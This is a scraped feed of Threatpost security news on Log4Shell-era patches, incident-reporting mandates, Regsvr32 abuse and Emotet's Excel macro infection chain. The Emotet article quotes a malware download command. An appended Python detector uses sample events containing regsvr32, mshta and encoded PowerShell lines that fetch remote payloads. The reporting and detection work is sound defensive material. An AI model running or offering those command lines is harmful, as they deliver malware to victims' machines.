This **_[**_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_**, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken.**_\n\n[_**Register NOW**_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ for the LIVE event!_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T19:00:36", "type": "threatpost", "title": "'Appalling' Riot Games Job Fraud Takes Aim at Wallets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T19:00:36", "id": "THREATPOST:065F7608AC06475E765018E97F14998D", "href": 
"https://threatpost.com/riot-games-job-fraud/176950/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T13:53:59", "description": "You know that hazy window that\u2019s been obscuring the cyber threat landscape, leaving the feds squinting to try to see what\u2019s really going on?\n\nThe government has recently pulled out some squeegees.\n\nCase in point: the [government spending deal](<https://www.natlawreview.com/article/legislation-requiring-reporting-certain-cyber-incidents-enacted>) that President Biden signed into law on Friday. The bill mandates that critical infrastructure operators report a significant cyber incident within 72 hours and a ransomware payment in 24 hours.\n\n## It\u2019s About Time\n\nAs Politico [reported](<https://subscriber.politicopro.com/article/2022/03/cyber-incident-reporting-mandate-passes-congress-in-spending-bill-00016470>), senior government officials and cyber policy watchers said the legislation is long overdue. As it is, they\u2019ve long warned that federal cyber defenders don\u2019t have nearly enough information about the digital threat landscape.\n\n\u201cThis is the main thing that we\u2019ve struggled with forever,\u201d said Jonathan Reiber, senior director for cybersecurity strategy & policy at the cybersecurity company [AttackIQ](<https://attackiq.com/>) and former chief strategy officer for cyber policy for the Obama administration. \u201cAnne Neuberger, the White House deputy national security advisor for cyber security, after the [SolarWinds](<https://threatpost.com/solarwinds-hack-seismic-shift/165758/>) intrusion, she said, \u2018Look, we lack visibility into how the adversaries are behaving within private sector networks,'\u201d he noted.\n\n## Feds: The Only Ones Who Can Retaliate Against Nation States\n\nThe timing is suggestive. 
As it is, the new mandates coincide with [proposals](<https://www.jdsupra.com/legalnews/sec-proposes-new-rules-to-enhance-8659099/>) recently issued by the Securities and Exchange Commission (SEC) that would require some financial firms and listed companies to report cyberattacks to the regulator, create detailed plans for responding to hacks, and explain how they manage cybersecurity at all levels.\n\nPadraic O\u2019Reilly, financial firm and public company cyber risk advisor and co-founder of cyber risk management firm [CyberSaint](<https://www.cybersaint.io/>), is working directly with the financial services industry and public companies to understand and comply with these potential new reporting and board requirements. If enacted as written, he told Threatpost on Wednesday, the SEC\u2019s proposed rules would substantially complicate how thousands of companies track, handle and report cyberattacks.\n\nIn these times of intense cyber aggression from nation states, the government has to step up, Reiber said. After all, it\u2019s the only one who can.\n\n\u201cThe government is the only one who can impose costs externally on a country that\u2019s doing something to the United States,\u201d he said in this week\u2019s Threatpost podcast.\n\n\u201cConstitutionally, it\u2019s the duty of the executive branch [and [U.S. Cyber Command](<https://www.cybercom.mil/>)] to provide for the nation\u2019s defense. You don\u2019t want companies having to go up against a nation state on their own,\u201d Reiber said.\n\nThe new mandates will help, he said. They\u2019ll help the government to assume the burden of risk when it comes to providing a counter offense operation \u2013 if it\u2019s required.\n\nRegarding the difference between the SEC proposals and the spending bill, O\u2019Reilly explained that \u201cThe SEC is out in front of the wider issue of transparency vs. 
the Cyber Reporting Bill \u2026 focuses more on the nuts and bolts of reporting these attacks\u201d to the Department of Homeland Security, he told Threatpost via email.\n\nThe SEC is going to address \u201cseveral incidents that weren\u2019t reported correctly,\u201d he said, and its proposal shows \u201ctailwinds around where future cybersecurity legislation will be heading in terms of public disclosure of cyber posture.\u201d\n\nIn this week\u2019s podcast, Reiber took a look at a number of questions on the spending bill\u2019s reporting mandates, including what should and shouldn\u2019t be considered to be a \u201csignificant\u201d cyber incident, why strategic public and private sector partnerships will be vital, and more \u2013 including a big \u201chuzzah!\u201d regarding a nice shot in the arm for the Cybersecurity and Infrastructure Security Agency (CISA): namely, a $568 million increase above last year\u2019s funding level that [surpasses](<https://www.cisa.gov/news/2022/03/11/statement-cisa-director-easterly-passage-cyber-incident-reporting-legislation>) the amount requested by the president.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/031522_Jonathan_Reiber_Attack_IQ_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-17T13:00:38", "type": "threatpost", "title": "Reporting Mandates to Clear Up Feds\u2019 Hazy Look into Threat Landscape \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-17T13:00:38", "id": "THREATPOST:13D4AE4C03A3BF687491FDA1E8D732C7", "href": "https://threatpost.com/reporting-mandates-to-clear-up-feds-hazy-look-into-threat-landscape-podcast/178947/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-15T20:20:39", "description": "SAP has identified 32 apps that are affected by [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) 
\u2013 the critical vulnerability in the Apache Log4j Java-based logging library that\u2019s been [under active attack](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) since last week.\n\nAs of yesterday, Patch Tuesday, the German software maker reported that it\u2019s already patched 20 of those apps, and it\u2019s still feverishly working on fixes for 12. SAP provided workarounds for some of the pending patches in [this document](<https://support.sap.com/content/dam/support/en_us/library/ssp/my-support/trust-center/sap-tc-01-5025.pdf>), accessible to users on the company\u2019s support portal.\n\nThe news about Log4Shell has been nonstop, with the easily exploited, ubiquitous vulnerability spinning off even [more dangerous variations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>), being associated with yet another [vulnerability in Apache\u2019s fast-baked patch](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) and threat actors jumping on it on a [global scale](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>).\n\nBetween Sunday and Wednesday morning ET, SAP had released 50 SAP Notes and Knowledge Base entries focusing on Log4j.\n\n## **Beyond \u2018Logapalooza\u2019: Other SAP Patch Tuesday Fixes**\n\nBut hard though it may be to believe, there are other SAP security matters to attend to besides Logapalooza, including fixes for other severe flaws in the company\u2019s products. On Tuesday, [SAP released](<https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+December+2021>) 21 new and updated security patches, including four HotNews Notes and six High Priority Notes.\n\n\u201cHotNews\u201d is the highest-severity rating that SAP doles out. 
Three of December\u2019s HotNews-rated bugs carried a CVSS rating of 9.9 (out of 10) and the fourth hit the top mark of 10.\n\nThomas Fritsch, an SAP security researcher at enterprise security firm Onapsis, said in his SAP Patch Tuesday [writeup](<https://onapsis.com/blog/sap-security-patch-day-december-2021-patch-day-shadow-log4j>) that the number of HotNews Notes may seem high, but one of them \u2013 [#3089831](<https://launchpad.support.sap.com/#/notes/3089831>), tagged with a CVSS score of 9.9 \u2013 was initially released on SAP\u2019s September 2021 Patch Tuesday. Covering an SQL-injection vulnerability in SAP NZDT Mapping Table Framework, the note was updated in the December Patch Tuesday batch with what Fritsch said was information about possible symptoms. \u201cSAP explicitly says that the update does not require any customer action,\u201d he noted.\n\nAnother of the HotNews Notes \u2013 [#2622660](<https://launchpad.support.sap.com/#/notes/2622660>) \u2013 is rated a top criticality of 10, but it\u2019s the continuously recurring HotNews Note that provides an SAP Business Client Patch with the latest tested Chromium fixes.\n\n\u201cSAP Business Client customers already know that updates of this note always contain important fixes that must be addressed,\u201d Fritsch said. \u201cThe note references 62 Chromium fixes with a maximum CVSS score of 9.6 \u2014 26 of them rated with High Priority. 
The last number only reflects vulnerabilities that were reported externally, as Google doesn\u2019t provide such information about internally detected issues.\u201d\n\nTaking these out, what\u2019s left of the most critical non-Log4Shell patches are a duo for SAP Commerce that were both released with a CVSS criticality of 9.9, and which are detailed below.\n\n### SAP HotNews Note Security Note [#3109577](<https://launchpad.support.sap.com/#/notes/3109577>)\n\nThis note is for a code-execution vulnerability in SAP Commerce, localization for China, that covers 11 related CVEs. SAP has tagged it with a CVSS score of 9.9. The note patches multiple code-execution vulnerabilities in the product. Fritsch noted that the localization for China package uses the open-source library [XStream](<https://x-stream.github.io/>): a simple library that serializes objects to XML and back again.\n\nSAP\u2019s note provides a patch for version 2001 of the localization for China package, meaning that SAP Commerce customers using a lower version need to upgrade before applying the patch, Fritsch said. 
He pulled out two things worth mentioning when comparing the note\u2019s CVEs with the patches listed on <https://x-stream.github.io/security.html>:\n\n * The provided SAP patch contains version 1.4.15 of the XStream library\n * Version 1.4.15 specifically patches Code Execution vulnerabilities, but following the XStream patch history, it also fixes two Denial-of-Service vulnerabilities and a Server-Side Request Forgery vulnerability\n\n\u201cAs a workaround, affected customers can also directly replace the affected XStream library file with its latest version,\u201d Fritsch advised.\n\n### SAP HotNews Note Security Note [#3119365](<https://launchpad.support.sap.com/#/notes/3119365>)\n\nThis one, which is also tagged with a CVSS score of 9.9, patches a code injection issue in a text extraction report of the Translation Tools of SAP ABAP Server & ABAP Platform.\n\nFound in Versions 701, 740, 750, 751, 752, 753, 754, 755, 756 and 804, the vulnerability allows an attacker with low privileges to execute arbitrary commands in the background, Fritsch explained. The fact that such an attacker would need at least a few privileges to exploit the vulnerability bumped its CVSS score down from 10, he said.\n\n\u201cThe provided patch just deactivates the affected coding,\u201d Fritsch continued. 
\u201cThe report is only used by SAP internally, was not intended for release, and does not impact existing functionality.\u201d\n\nThose who can access the note and who are interested in which report is affected can get that information in the \u201cCorrection Instructions\u201d section by activating the tab \u201cTADIR Entries,\u201d Fritsch said.\n\n## Notable SAP High Priority Notes\n\n### SAP Security Notes [#3114134](<https://launchpad.support.sap.com/#/notes/3114134>) and [#3113593](<https://launchpad.support.sap.com/#/notes/3113593>)\n\nSAP Commerce is also affected by these two notable High Priority notes.\n\nTagged with a CVSS score of 8.8, the first high-priority note addresses SAP Commerce installations configured to use an Oracle database, according to Fritsch. \u201cThe escaping of values passed to a parameterized \u201cin\u201d clause, in flexible search queries with more than 1000 values, is processed incorrectly,\u201d he explained. \u201cThis allows an attacker to execute crafted database queries through the injection of malicious SQL commands, thus exposing the backend database.\u201d\n\nSAP Commerce customers using the B2C Accelerator are also affected by SAP Security Note #3113593, tagged with a CVSS score of 7.5. The flaw can allow an attacker with direct write access to product-related metadata in B2C Accelerator to exploit a vulnerability in the jsoup library responsible for metadata sanitization before it\u2019s processed, Fritsch said, allowing the attacker to inflict long response delays and service interruptions that result in denial of service (DoS).\n\n### SAP Knowledge Warehouse High Priority Note [#3102769](<https://launchpad.support.sap.com/#/notes/3102769>)\n\nAnother high-priority note, in SAP Knowledge Warehouse (SAP KW), is #3102769, tagged with a CVSS score of 8.8. 
The note patches a cross-site scripting (XSS) vulnerability that can result in sensitive data being disclosed.\n\n\u201cThe vulnerability affects the displaying component of SAP KW and SAP explicitly points out that the pure existence of that component in the customer\u2019s landscape is all that is needed to be vulnerable,\u201d Fritsch cautioned.\n\nCustomers who don\u2019t actively use the displaying component of SAP KW may still experience a security breach, he noted.\n\nThe note details two possible workarounds:\n\n * Disabling the affected display component by adding a filter with a specific custom rule\n * Adding a rewrite rule to SAP Web Dispatcher to prevent redirects (this is only applicable if requests are routed via SAP Web Dispatcher)\n\n### SAP NetWeaver AS ABAP High Priority Note [#3123196](<https://launchpad.support.sap.com/#/notes/3123196>)\n\nWith a CVSS score of 8.4, SAP Security Note [#3123196](<https://launchpad.support.sap.com/#/notes/3123196>) describes a code injection vulnerability in two methods of a utility class in SAP NetWeaver AS ABAP.\n\n\u201cA highly privileged user with permissions to use transaction SE24 or SE80 and execute development objects is able to call these methods and provide malicious parameter values that can lead to the execution of arbitrary commands on the operating system,\u201d Fritsch elucidated.\n\nSAP fixed the problem by integrating the affected methods directly into the class without the possibility of passing parameters to those methods. Fritsch said that the affected classes and methods are available in the \u201cCorrection Instructions\u201d section by selecting the tab \u201cTADIR Entries.\u201d\n\n### SAF-T Framework SAP High Priority Security Note [#3124094](<https://launchpad.support.sap.com/#/notes/3124094>)\n\nThis one, which patches a directory-traversal vulnerability in the SAF-T framework, is tagged with a CVSS score of 7.7. 
It addresses an issue with the SAF-T framework, which is used to convert SAP tax data into the Standard Audit File Tax format (SAF-T) \u2013 an OECD international standard for the electronic exchange of data that enables tax authorities of all countries to accept data for tax purposes \u2013 and back.\n\nThe note describes how an insufficient validation of path information in the framework allows an attacker to read the complete file-system structure, Fritsch explained.\n\n## Open-Source Libraries as the Weakest Link\n\nFritsch pointed to the Log4j vulnerability and the vulnerabilities described in SAP Security Notes #3109577 and #3113593 as demonstrating \u201cthat there is always a risk involved when using open-source libraries.\u201d\n\nBesides the Log4Shell elephant in the room, recent examples that prove his point about the risks entailed by relying on the security of outside code include, for example, the recent discovery of three [malicious packages hosted](<https://threatpost.com/malicious-pypi-code-packages/176971/>) in the Python Package Index (PyPI) code repository that collectively have more than 12,000 downloads: downloads that potentially translate into loads of poisoned applications.\n\nAnother of many examples of how the software supply chain has become an increasingly popular method of distributing malware cropped up last week, when a series of malicious packages in the Node.js package manager (npm) code repository that looked to harvest Discord tokens [was found.](<https://threatpost.com/malicious-npm-code-packages-discord/176886/>)\n\nExternal libraries are convenient, but are they worth the risk? You have to do the math to figure that out, Fritsch summed up: \u201cThe ability to implement new features in a short period of time is bought at the price of dependence on the security of the external libraries. 
Remember, a software product is only as secure as its weakest software component.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-15T19:31:30", "type": "threatpost", "title": "SAP Kicks Log4Shell Vulnerability Out of 20 Apps", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-15T19:31:30", "id": "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "href": "https://threatpost.com/sap-log4shell-vulnerability-apps/177069/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-09T22:25:28", "description": "A Windows living-off-the-land binary ([LOLBin](<https://threatpost.com/cybersecurity-failing-ransomware/175637/>)) known as Regsvr32 is seeing a [big uptick](<https://github.com/uptycslabs/IOCs/tree/main/Attacker%20increasingly%20adopting%20Squiblydoo%20technique%20via%20office%20documents>) in 
abuse of late, researchers are warning, mainly to spread trojans such as Lokibot and Qbot.\n\nLOLBins are legitimate, native utilities used daily in ordinary computing environments, which cybercriminals abuse to evade detection by blending in with normal activity patterns. In this case, Regsvr32 is a Microsoft-signed command-line utility in Windows that registers and unregisters libraries. Registering a .DLL file adds information to the central directory (the Registry) so that the library can be used by Windows and shared among programs.\n\nThis long reach is catnip to cyberattackers, who can abuse the utility via the [\u201cSquiblydoo\u201d technique](<https://car.mitre.org/analytics/CAR-2019-04-003/>), Uptycs researchers warned.\n\n\u201cThreat actors can use Regsvr32 for loading COM scriptlets to execute DLLs,\u201d they explained in a [Wednesday writeup](<https://www.uptycs.com/blog/attackers-increasingly-adopting-regsvr32-utility-execution-via-office-documents>). \u201cThis method does not make changes to the Registry as the COM object is not actually registered, but [rather] is executed. This technique [allows] threat actors to bypass application whitelisting during the execution phase of the attack kill chain.\u201d\n\n## **The .OCX Connection**\n\nMalicious use of Regsvr32 has been cresting of late in the Uptycs telemetry, researchers warned, with cybercrooks specifically attempting to register .OCX files in the Registry via various types of malicious Microsoft Office documents. As a class, .OCX files contain ActiveX controls: code modules that Microsoft developed to let applications perform specific functions, such as displaying a calendar.\n\n\u201cThe Uptycs Threat Research team has observed more than 500+ malware samples using Regsvr32.exe to register [malicious] .OCX files,\u201d researchers warned. 
\u201cDuring our analysis of these malware samples, we have identified that some of the malware samples belonged to [Qbot](<https://threatpost.com/revamped-qbot-trojan-packs-new-punch-hijacks-email-threads/158715/>) and [Lokibot](<https://threatpost.com/cisa-lokibot-stealer-resurgence/159495/>) attempting to execute .OCX files\u202697 percent of these samples belonged to malicious Microsoft Office documents such as Excel spreadsheet files.\u201d\n\nMost of the Microsoft Excel files observed in the attacks carry the .XLSM or .XLSB suffix, they added; both formats can contain embedded macros. During the attack, the macro formulas typically download or execute a malicious payload from a remote URL.\n\nSimilarly, some campaigns use Microsoft Word, Rich Text Format or Compound Document files (.DOC, .DOCX or .DOCM) embedded with malicious macros, according to Uptycs.\n\n## **Identifying Suspicious regsvr32 Executions**\n\nBecause Regsvr32, like other LOLBins, is used for legitimate daily operations, its abuse often evades traditional cybersecurity defenses. 
However, researchers noted that security teams can monitor for two specific behaviors in order to track its activity:\n\n * Parent/child process relationships in which Regsvr32 is executed with Microsoft Word or Microsoft Excel as the parent process;\n * Regsvr32 executions that load scrobj.dll, the library that executes a COM scriptlet.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-09T21:56:49", "type": "threatpost", "title": "Cybercriminals Swarm Windows Utility Regsvr32 to Spread Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-09T21:56:49", "id": "THREATPOST:8D57BD39C913E8DDC450DD9EF2564C2C", "href": "https://threatpost.com/cybercriminals-windows-utility-regsvr32-malware/178333/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2022-02-16T13:47:16", "description": "The infamous Emotet malware has switched tactics yet again, in an email campaign propagating through malicious Excel files, researchers have found.\n\nResearchers at Palo Alto Networks Unit 42 have observed a new infection approach for the high-volume malware, which is known to modify and change its attack vectors to avoid detection so it can continue to do its nefarious work, they [wrote in a report](<https://unit42.paloaltonetworks.com/new-emotet-infection-method/>) published online Tuesday.\n\n\u201cEmotet\u2019s new attack chain reveals multiple stages with different file types and obfuscated script before arriving at the final Emotet payload,\u201d Unit 42 researchers Saqib Khanzada, Tyler Halfpop, Micah Yates and Brad Duncan wrote.\n\nThe new attack vector, discovered on Dec. 21 and still active, delivers an Excel file containing an obfuscated Excel 4.0 macro via socially engineered emails.\n\n\u201cWhen the macro is activated, it downloads and executes an HTML application that downloads two stages of PowerShell to retrieve and execute the final Emotet payload,\u201d researchers wrote.\n\n## **The Malware That Won\u2019t Die**\n\nEmotet started life as a banking trojan in 2014 and has continually evolved into a full-service threat-delivery mechanism, at one point operating as a botnet that held more than 1.5 million machines under its control, according to Check Point Software. Typical consequences of infection are bank-account takeover, high-value wire fraud and ransomware attacks.\n\nIndeed, at the end of its original heyday, the estimated damage from Emotet was around $2.5 billion, researchers have said.\n\nThen, Emotet appeared to be [put out of commission](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) by an international law-enforcement collaborative takedown of a network of hundreds of botnet servers supporting the system in January 2021. 
However, it resurfaced [last November](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) on the back of frequent partner-in-crime [TrickBot](<https://threatpost.com/trickbot-cybercrime-elite-affiliates/175510/>) \u2014 and now continues to [be a threat.](<https://threatpost.com/emotets-behavior-spread-are-omens-of-ransomware-attacks/176845/>)\n\nSince its return, Emotet has used [thread hijacking](<https://threatpost.com/emotet-returns-100k-mailboxes/162584/>) and other tactics as part of novel attack methods.\n\n\u201cThis technique generates fake replies based on legitimate emails stolen from mail clients of Windows hosts previously infected with Emotet,\u201d Unit 42 researchers wrote. \u201cThe botnet uses this stolen email data to create fake replies impersonating the original senders.\u201d\n\nExamples of this method, [reported](<https://www.bleepingcomputer.com/news/security/emotet-now-spreads-via-fake-adobe-windows-app-installer-packages/>) in December, included links that installed a fake Adobe Windows App Installer package, researchers wrote.\n\n## **Using Excel Macros**\n\nThe new Emotet infection method using Excel macros also has several variations, according to Unit 42.\n\n\u201cIn some cases, Emotet uses a password-protected .ZIP archive as an attachment to its email,\u201d researchers explained. \u201cIn other cases, Emotet uses an Excel spreadsheet directly attached to the email.\u201d\n\nResearchers outlined an email sent by the Emotet botnet on Jan. 27 that uses a stolen email thread from June 2021. The email uses a lure heralding a \u201cnew announcement\u201d to a \u201cvaluable supplier\u201d and contains an encrypted .ZIP file in an attempt to bypass security systems, researchers wrote. 
It also includes the password to the .ZIP file in the email, so the victim can extract its contents.\n\n\u201cThe encrypted .ZIP file contains a single Excel document with Excel 4.0 macros,\u201d researchers wrote. \u201cThese macros are an old Excel feature that is frequently abused by malicious actors. The victim must enable macros on a vulnerable Windows host before the malicious content is activated.\u201d\n\nOnce that\u2019s done, the macro code executes cmd.exe to run mshta.exe, with an argument to retrieve and execute a remote HTML application that downloads and executes additional PowerShell code, researchers wrote.\n\n\u201cThe code utilizes hex and character obfuscation in order to attempt to bypass static detection measures,\u201d they explained. \u201cThe deobfuscated command string that is executed is: cmd /c mshta hxxp://91.240.118[.]168/se/s.html.\u201d\n\nThe initial obfuscated PowerShell script connects to hxxp://91.240.118[.]168/se/s.png, a URL that returns a text-based script for a second-stage set of PowerShell code designed to retrieve an Emotet binary.\n\n\u201cThis second-stage PowerShell code\u2026contains 14 URLs to retrieve the Emotet binary,\u201d researchers wrote. \u201cThe script attempts each URL until an Emotet binary is successfully downloaded.\u201d\n\nHaving multiple URLs in its attack chain is aimed at making it more resilient in the event that one of the URLs is taken down, researchers said. 
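The Emotet chain just described (Excel 4.0 macro, then cmd.exe, then mshta.exe fetching a remote HTA, then PowerShell) and the Regsvr32 indicators Uptycs lists earlier on this page (Regsvr32 with a Word or Excel parent, or Regsvr32 loading scrobj.dll) are the same class of signal: a living-off-the-land binary turning up in a process tree rooted at an Office application. The Python below is an added example written for this page, not code from Unit 42 or Uptycs. It walks constructed process-creation events in a Sysmon-like shape (pid, parent pid, image, command line, plus the DLLs loaded by that pid) and raises one alert per indicator; the PIDs, paths and the 198.51.100.7 address are made up.

```python
"""Flag Office-rooted LOLBin chains: regsvr32 'Squiblydoo' and cmd -> mshta -> powershell.

Added example for this page; the events below are constructed, not real telemetry.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str                                       # executable basename, lower-case
    cmdline: str
    loaded: List[str] = field(default_factory=list)  # image-load events seen for this pid


def ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[str]:
    """Images of ev's parent, grandparent, ... up to the root (cycle-safe)."""
    chain, seen = [], set()
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur.image)
        cur = by_pid.get(cur.ppid)
    return chain


def detect(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, reason) alerts for the indicators discussed in the articles."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        cmd = ev.cmdline.lower()
        lineage = ancestors(ev, by_pid)
        under_office = any(img in OFFICE_APPS for img in lineage)
        if ev.image == "regsvr32.exe":
            # Squiblydoo: regsvr32 /s /n /u /i:<url> scrobj.dll runs a remote COM scriptlet
            # without registering anything; the scrobj.dll load is the tell.
            if "scrobj.dll" in cmd or any(d.lower().endswith("scrobj.dll") for d in ev.loaded):
                alerts.append((ev.pid, "regsvr32 loaded scrobj.dll (COM scriptlet execution)"))
            # Office macros registering dropped .OCX/.DLL payloads: regsvr32 beneath Word/Excel.
            if under_office:
                alerts.append((ev.pid, "regsvr32 executed beneath an Office process"))
        elif ev.image == "mshta.exe" and under_office and ("http://" in cmd or "https://" in cmd):
            alerts.append((ev.pid, "mshta fetching a remote HTA beneath an Office process"))
        elif ev.image == "powershell.exe" and "mshta.exe" in lineage:
            alerts.append((ev.pid, "powershell spawned by mshta"))
    return alerts


def sample_events() -> List[ProcEvent]:
    """Constructed events: three malicious trees and one benign regsvr32 run."""
    return [
        ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
        # Excel macro registering a dropped .OCX (the Uptycs pattern)
        ProcEvent(200, 100, "excel.exe", '"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE" /dde'),
        ProcEvent(201, 200, "regsvr32.exe", "regsvr32.exe /s C:\\Users\\Public\\invoice.ocx"),
        # Word macro running a remote scriptlet (Squiblydoo)
        ProcEvent(300, 100, "winword.exe", "WINWORD.EXE /n"),
        ProcEvent(301, 300, "regsvr32.exe",
                  "regsvr32 /s /n /u /i:http://198.51.100.7/x.sct scrobj.dll",
                  loaded=["C:\\Windows\\System32\\scrobj.dll"]),
        # Emotet-style chain: Excel 4.0 macro -> cmd -> mshta <url> -> powershell
        ProcEvent(400, 100, "excel.exe", "EXCEL.EXE"),
        ProcEvent(401, 400, "cmd.exe", "cmd /c mshta http://198.51.100.7/se/s.html"),
        ProcEvent(402, 401, "mshta.exe", "mshta http://198.51.100.7/se/s.html"),
        ProcEvent(403, 402, "powershell.exe", "powershell -w hidden -enc SQBFAFgA"),
        # Benign: a service registering a system DLL, no Office ancestor, no scriptlet
        ProcEvent(500, 1, "services.exe", "services.exe"),
        ProcEvent(501, 500, "regsvr32.exe", "regsvr32 /s C:\\Windows\\System32\\msxml3.dll"),
    ]


if __name__ == "__main__":
    for pid, reason in detect(sample_events()):
        print(f"pid {pid}: {reason}")
```

Walking the full ancestry rather than checking only the immediate parent is what catches the Emotet variant, where cmd.exe sits between Excel and mshta; the benign services.exe tree shows why the rule keys on lineage and scrobj.dll rather than on regsvr32 itself.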
